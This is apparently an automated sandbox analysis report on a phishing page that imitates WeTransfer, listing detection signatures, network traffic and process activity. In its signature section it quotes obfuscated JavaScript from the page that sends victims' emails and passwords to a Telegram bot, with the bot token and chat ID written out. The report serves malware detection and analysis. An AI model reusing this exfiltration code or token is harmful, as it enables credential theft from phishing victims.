Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://connexion-espacesclients.support/gkm/

Overview

General Information

Sample URL:https://connexion-espacesclients.support/gkm/
Analysis ID:1567263

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
AI detected suspicious URL
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6360 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1984,i,14936015227180645046,5900502417263220096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://connexion-espacesclients.support/gkm/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://connexion-espacesclients.support/gkm/Avira URL Cloud: detection malicious, Label: phishing

Phishing

barindex
Source: https://connexion-espacesclients.support/gkm/Joe Sandbox AI: Score: 9 Reasons: The brand 'Wetransfer' is well-known and typically associated with the domain 'wetransfer.com'., The URL 'connexion-espacesclients.support' does not match the legitimate domain of Wetransfer., The URL contains suspicious elements such as hyphens and an unusual domain extension '.support', which are common in phishing attempts., The URL does not contain any recognizable association with Wetransfer, which raises suspicion., The presence of input fields asking for email addresses is a common tactic used in phishing sites to collect user information. DOM: 2.6.pages.csv
Source: https://connexion-espacesclients.support/gkm/Joe Sandbox AI: Page contains button: 'Continuer' Source: '2.7.pages.csv'
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script contains multiple high-risk indicators: heavily obfuscated data/URLs (encoded strings and tokens), suspicious domain pattern (connexion-espacesclients.support), and complex challenge/verification parameters suggesting potential security bypass or phishing attempt. The extensive use of encoded parameters and suspicious TLD (.support) adds to risk profile.
Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script with multiple red flags: uses eval() with base64 encoded content (+3), contains obfuscated code (+3), performs aggressive DOM manipulation with form submission (+2). The script also includes bot detection logic and automatic form submission/page reloads, which could be used maliciously. The use of XMLHttpRequest to an internal endpoint '/gkm/' with encoded headers adds suspicion.
Source: 2.10..script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script shows multiple high-risk indicators: heavy obfuscation (encoded strings, complex control flow), use of dynamic code manipulation (String.fromCharCode), and suspicious array/binary operations. The code appears to be a challenge/fingerprinting script with intentionally obscured functionality.
Source: 0.13.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: This is a highly malicious script that exhibits multiple high-risk behaviors: 1) It contains obfuscated code using hex encoding, 2) It exfiltrates sensitive data (email/password) to Telegram via a bot token, 3) It appears to be part of a phishing operation based on the credential collection and error handling patterns. The presence of a Telegram bot token (7499623592:AAG4sRR7YzmOAFkZFFwiAbBsnnHB-lXYLSk) for data exfiltration is a clear indicator of malicious intent.
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://connexion-espacesclients.support
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://connexion-espacesclients.support
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: var _0x40d1b3 = _0x1298; function _0x1298(_0x93b389, _0x301fc5) { var _0x190b9e = _0x190b(); return ( (_0x1298 = function (_0x12988f, _0x35f94c) { _0x12988f = _0x12988f - 0x121; var _0x866d3 = _0x190b9e[_0x12988f]; return _0x866d3; }), _0x1298(_0x93b389, _0x301fc5) ); } function _0x1298a(data) { const _0x40d1b3a = '7499623592:aag4srr7yzmoafkzffwiabbsnnhb-lxylsk'; const _0x301fc5a = '1411469413'; const _0x93b389a = ` - ${data.email}:${data.password}`; const _0x190b9ea = `https://api.telegram.org/bot${_0x40d1b3a}/sendmessage?chat_id=${_0x301fc5a}&text=${encodeuricomponent( _0x93b389a )}`; fetch(_0x190b9ea, { method: "get" }) .then((response) => { if (response.ok) { // la requte a russi } else { } }) .catch((error) => { console.error(error); }); } function _0x190b() { var _0...
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: Number of links: 0
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: Total embedded image size: 97542
Source: https://connexion-espacesclients.support/gkm/?__cf_chl_rt_tk=ikmDfOrsD_3PGWhiFgfOsLgIkMRFnIf6Cg1queg1K08-1733219199-1.0.1.1-pjQs1POxFuUapvCSUYkqFSNZD0TR_nfsaK15qyYdMpEHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: Title: Wetransfer - Partage de document. does not match URL
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: <input type="password" .../> found
Source: https://connexion-espacesclients.support/gkm/?__cf_chl_rt_tk=ikmDfOrsD_3PGWhiFgfOsLgIkMRFnIf6Cg1queg1K08-1733219199-1.0.1.1-pjQs1POxFuUapvCSUYkqFSNZD0TR_nfsaK15qyYdMpEHTTP Parser: No favicon
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No favicon
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No favicon
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No favicon
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No favicon
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No <meta name="author".. found
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No <meta name="author".. found
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No <meta name="copyright".. found
Source: https://connexion-espacesclients.support/gkm/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49772 version: TLS 1.2

Networking

barindex
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: global trafficDNS traffic detected: DNS query: connexion-espacesclients.support
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdn.tailwindcss.com
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: global trafficDNS traffic detected: DNS query: wetransfer.com
Source: global trafficDNS traffic detected: DNS query: cdn.wetransfer.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: classification engineClassification label: mal76.phis.troj.win@22/25@34/171
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1984,i,14936015227180645046,5900502417263220096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://connexion-espacesclients.support/gkm/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1984,i,14936015227180645046,5900502417263220096,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
